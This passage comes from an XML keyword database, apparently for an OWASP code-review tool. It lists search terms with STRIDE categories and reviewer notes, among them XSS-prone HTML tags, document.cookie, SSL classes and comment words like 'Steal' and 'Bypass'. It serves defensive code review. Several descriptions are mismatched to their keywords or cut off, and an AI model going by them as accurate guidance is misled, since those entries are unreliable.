<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>XMLHTTP</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Struts</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.apache.struts</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Spring</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.springframework</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Java Server Faces (JSF)</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>import javax.faces</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Hibernate</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>import org.hibernate</k_name>
<k_level>2</k_level>
<k_description>Operations performed via a stateless session bypass Hibernate's event model and interceptors. Stateless sessions are vulnerable to data aliasing effects, due to the lack of a first-level cache.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frameset&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;embed&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frame&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;html&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;iframe&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;img&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;style&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;layer&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Kludge</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Bypass</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Steal</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Stolen</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Divert</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Broke</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Trick</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Fix</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ToDo</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for the following keywords as pointers to possible software vulnerabilities... ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.write</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.cookie</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionality as this would have a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>window.location</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.URL</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>window.createRequest</k_name>
<k_level>2</k_level>
<k_description>If this function is used with Java Ajax on the client side, such usage should be avoided.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getSession</k_name>
<k_level>2</k_level>
<k_description>Always be wary of session management. Look at each session object within the application and ensure its level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>KeyManagerFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpsURLConnection</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>TrustManagerFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SSLSocketFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SSLContext</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>com.sun.net.ssl</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Connection.prepareCall</k_name>
<k_level>2</k_level>
<k_description>When searching for Java database related code, this list should help you pinpoint the classes/methods involved in the persistence layer of the application being reviewed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>response.write</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks result from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.TotalBytes</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.IsSecureConnection</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.servervariables</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;%=</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks result from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpUtility</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks result from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>enableViewStateMac</k_name>
<k_level>2</k_level>
<k_description>It is important to note that many variables in machine.config can be overridden in the web.config file for a particular application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecureString</k_name>
<k_level>2</k_level>
<k_description>If storing sensitive data in memory, it is recommended that one use the following.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Console.WriteLine</k_name>
<k_level>1</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine if any sensitive information is being logged. Common mistakes are logging the userID in conjunction with passwords within the authentication functionality, or logging database requests which may contain sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Reflection</k_name>
<k_level>1</k_level>
<k_description>
Code that is generated dynamically (at runtime) as a function of external input may give rise to security issues. This means if your code contains sensitive data, does it need to be serialized?
</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.SkipVerification</k_name>
<k_level>1</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>addCookie</k_name>
<k_level>1</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. Such calls should be examined closely, as many of these APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>debug</k_name>
<k_level>1</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>UrlEncode</k_name>
<k_level>1</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.UnmanagedCode</k_name>
<k_level>1</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HtmlEncode</k_name>
<k_level>1</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>void Write</k_name>
<k_level>1</k_level>
<k_description>Different programming languages use different terms to identify the fundamental managed types. Class library designers must avoid using language-specific terminology. Follow the rules described in this section to avoid type name confusion. Use names that describe a type's meaning rather than names that describe the type. In the rare case that a parameter has no semantic meaning beyond its type, use a generic name.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Sub Write</k_name>
<k_level>1</k_level>
<k_description>Different programming languages use different terms to identify the fundamental managed types. Class library designers must avoid using language-specific terminology. Follow the rules described in this section to avoid type name confusion. Use names that describe a type's meaning rather than names that describe the type. In the rare case that a parameter has no semantic meaning beyond its type, use a generic name.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
</CodeCrawlerDatabase>